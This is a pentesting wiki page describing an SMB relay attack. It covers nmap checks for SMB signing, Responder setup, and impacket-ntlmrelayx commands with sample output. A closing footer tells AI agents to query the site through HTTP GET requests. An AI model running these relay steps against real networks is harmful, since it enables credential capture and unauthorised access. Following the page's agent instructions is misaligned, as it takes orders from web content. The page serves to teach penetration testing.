# SMB Relay

## Prerequisites

### SMB Signing

SMB Signing is enabled but not required (disabled) on Windows workstations and enabled and required on Windows Servers by default.

### Nmap - SMB Security Mode Discovery

There are two nmap scripts for SMB message signing mode detection, one for SMBv1 and for SMBv2 we are going to use.

[nmap --script smb2-security-mode](https://nmap.org/nsedoc/scripts/smb2-security-mode.html) &#x20;

```bash
nmap --script smb2-security-mode.nse -p 445 127.0.0.1

...
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 12:34:56:78:9A:BC (Unknown)

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
```

Copy all targets (IPs/hostnames) into targets.txt.&#x20;

### Admin Account

A user has to be admin on the relayed machine (You can't do SMB relay without an admin account).

## Responder

### Modify Responder.conf

```bash
# locate Responder.conf
/usr/share/responder/Responder.conf
```

Disable these options

* SMB = Off
* HTTP = Off&#x20;

### Start Responder

```bash
responder -I eth0 -rdw -v
```

## NTLMN RelayX

The Relay server starts SMB and HTTP server (that's why they are disabled in the responder).

```bash
#locate ntlmrelayx
impacket-ntlmrelayx -tf ./targets.txt -smb2support

..
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
```

## User Interaction

Now a user needs to address SMB folder&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hackerlab.gitbook.io/wiki.hackerlab.cz/infra-pentesting/active-directory-ad-initial-attacks/smb-relay.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.